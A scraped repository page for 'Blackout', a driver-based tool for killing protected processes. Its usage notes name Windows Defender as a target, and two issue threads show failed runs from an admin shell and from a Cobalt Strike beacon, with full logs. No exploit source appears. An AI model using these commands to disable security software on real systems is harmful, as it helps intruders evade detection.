blackout's Introduction

Blackout

Usage

  • Place the driver Blackout.sys in the same path as the executable

  • The executable should be run in the context of an administrator

  • Blackout.exe -p <process_id>

  • For Windows Defender, keep the program running to prevent the service from restarting it


blackout's People

Contributors

zeromemoryex


blackout's Issues

Unable to reproduce the provided examples

Hello, thanks for your tool and your research,

I'm currently unable to perform the explained technique in my own lab.

Machine : Updated Windows 10
User : Administrator
Beacon : Administrator level

I have performed two tests:

  • First one ran directly on the command line as an administrative user

Blackout -p 2416

  • Second one ran from a Cobalt Strike beacon

Beacon as administrator, then getprivs, then Blackout -p 2416

From the Command Line (Windows Perspective)

c:\Users\admin\Desktop>tasklist | findstr notepad.exe
notepad.exe                   2416 RDP-Tcp#1                  2     17,364 K

c:\Users\admin\Desktop>whoami /priv

c:\Users\admin\Desktop>Blackout.exe -p 2416
driver path: c:\Users\admin\Desktop\Blackout.sys
Loading Blackout.sys driver ..
Service already exists.
faild to load driver ,try to run the program as administrator!!

c:\Users\admin\Desktop>

From the Cobalt Strike Beacon Perspective

[10/19 08:52:40] beacon> shell whoami /priv
[10/19 08:52:40] [*] Tasked beacon to run: whoami /priv
[10/19 08:53:04] [+] host called home, sent: 43 bytes
[10/19 08:53:04] [+] received output:

Privilege Name                            Description                                                        State   
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled 
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled 
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled 
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled 
SeSystemProfilePrivilege                  Profile system performance                                         Enabled 
SeSystemtimePrivilege                     Change the system time                                             Enabled 
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled 
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled 
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled 
SeBackupPrivilege                         Back up files and directories                                      Enabled 
SeRestorePrivilege                        Restore files and directories                                      Enabled 
SeShutdownPrivilege                       Shut down the system                                               Enabled 
SeDebugPrivilege                          Debug programs                                                     Enabled 
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled 
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled 
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled 
SeUndockPrivilege                         Remove computer from docking station                               Enabled 
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled 
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled 
SeCreateGlobalPrivilege                   Create global objects                                              Enabled 
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

[10/19 08:56:50] beacon> run c:\temp\Blackout.exe -p 2416
[10/19 08:56:50] [*] Tasked beacon to run: c:\temp\Blackout.exe -p 2416
[10/19 08:57:21] [+] host called home, sent: 46 bytes
[10/19 08:57:21] [+] received output:
driver path: C:\Windows\system32\Blackout.sys
Loading Blackout.sys driver .. 
Service already exists.
faild to load driver ,try to run the program as administrator!!

Any insight would be delightful.

Cannot open the driver

Code execution reaches:

    // Open the device object the Blackout driver is expected to expose
    HANDLE hDevice = CreateFile(L"\\\\.\\Blackout", GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    // GetLastError() returns 2 (ERROR_FILE_NOT_FOUND): no such device object exists

GetLastError() returns error 2. Output tips:
